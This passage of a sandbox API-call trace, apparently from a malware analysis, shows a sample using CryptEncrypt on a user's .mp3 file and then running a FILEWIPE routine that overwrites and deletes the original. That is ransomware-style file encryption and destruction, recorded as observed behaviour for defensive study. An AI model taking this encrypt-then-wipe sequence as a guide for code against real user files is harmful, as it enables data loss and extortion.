0x889c10 [0038.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.022] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.022] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0038.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0038.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0038.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0038.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0038.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0038.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.023] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0038.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0038.023] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0038.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0038.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0038.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0038.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd) returned 0x88ce08 [0038.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x88ce08, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0038.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0038.024] GetProcAddress (hModule=0x754b0000, lpProcName="CryptEncrypt") returned 0x754d779b [0038.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0038.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0038.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0038.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0038.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0038.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0038.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0038.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0038.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0038.024] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0038.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0038.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0038.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da278 | out: hHeap=0x770000) returned 1 [0038.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0038.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0038.024] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0038.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da328 | out: hHeap=0x770000) returned 1 [0038.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0038.025] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0xde21, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0xde30) returned 1 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da328 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1be8 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da388 [0038.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0038.025] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da388 | out: hHeap=0x770000) returned 1 [0038.025] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da328 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0038.025] CharLowerBuffW (in: lpsz="byte[56881]", cchLength=0xb | out: lpsz="byte[56881]") returned 0xb [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x24) returned 0x7ac350 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da208 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0038.025] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0038.027] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.028] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.028] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0038.028] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x942e38*, pdwDataLen=0x6ae220*=0xde21, dwBufLen=0xde30 | out: pbData=0x942e38*, pdwDataLen=0x6ae220*=0xde30) returned 1 [0038.030] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.030] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.030] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.036] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0038.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.036] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0038.036] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.037] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0038.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0038.037] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0038.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.037] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0038.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.037] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0038.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0038.037] FreeLibrary (hLibModule=0x754b0000) returned 1 [0038.038] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0038.038] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x834f67b0, ftCreationTime.dwHighDateTime=0x1d5c055, ftLastAccessTime.dwLowDateTime=0x263901d0, ftLastAccessTime.dwHighDateTime=0x1d5c447, ftLastWriteTime.dwLowDateTime=0x263901d0, ftLastWriteTime.dwHighDateTime=0x1d5c447, nFileSizeHigh=0x0, nFileSizeLow=0xde21, dwReserved0=0x0, dwReserved1=0x777648, cFileName="gYCwk0YFX3naEmF50.mp3", cAlternateFileName="GYCWK0~1.MP3")) returned 0x7c2100 [0038.038] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.038] CharLowerBuffW (in: lpsz="byte[56865]", cchLength=0xb | out: lpsz="byte[56865]") returned 0xb [0038.038] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0038.038] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0038.039] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0038.039] FreeLibrary (hLibModule=0x76b40000) returned 1 [0038.039] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0038.039] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0038.039] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.039] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\gycwk0yfx3naemf50.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0038.039] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.039] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0038.040] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.040] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.040] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.040] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0038.040] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0038.040] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0038.040] FreeLibrary (hLibModule=0x76e10000) returned 1 [0038.040] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3", nBufferLength=0x7fff, lpBuffer=0x69e9c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3", lpFilePart=0x0) returned 0x46 [0038.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0038.040] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3", lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x834f67b0, ftCreationTime.dwHighDateTime=0x1d5c055, ftLastAccessTime.dwLowDateTime=0x263901d0, ftLastAccessTime.dwHighDateTime=0x1d5c447, ftLastWriteTime.dwLowDateTime=0x1662be20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xde21, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="gYCwk0YFX3naEmF50.mp3", cAlternateFileName="GYCWK0~1.MP3")) returned 0x7c2100 [0038.040] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\KS4_7oSCes8f\\gYCwk0YFX3naEmF50.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ks4_7osces8f\\gycwk0yfx3naemf50.mp3")) returned 1 [0038.041] FindNextFileW (in: hFindFile=0x7c2100, lpFindFileData=0x6aea10 | out: lpFindFileData=0x6aea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x834f67b0, ftCreationTime.dwHighDateTime=0x1d5c055, ftLastAccessTime.dwLowDateTime=0x263901d0, ftLastAccessTime.dwHighDateTime=0x1d5c447, ftLastWriteTime.dwLowDateTime=0x1662be20, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0xde21, dwReserved0=0x6cf858, dwReserved1=0x77391ecd, cFileName="gYCwk0YFX3naEmF50.mp3", cAlternateFileName="GYCWK0~1.MP3")) returned 0 [0038.042] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x87aa40 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7d8 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0038.042] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16e8 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ac320 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0038.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b15a8 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0038.043] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0038.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0038.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0038.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0038.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0038.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af568 [0038.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0038.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0038.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0038.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0038.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0038.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0038.044] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0038.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0038.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af568 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0038.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x8899a0 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0038.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0038.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0038.044] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, 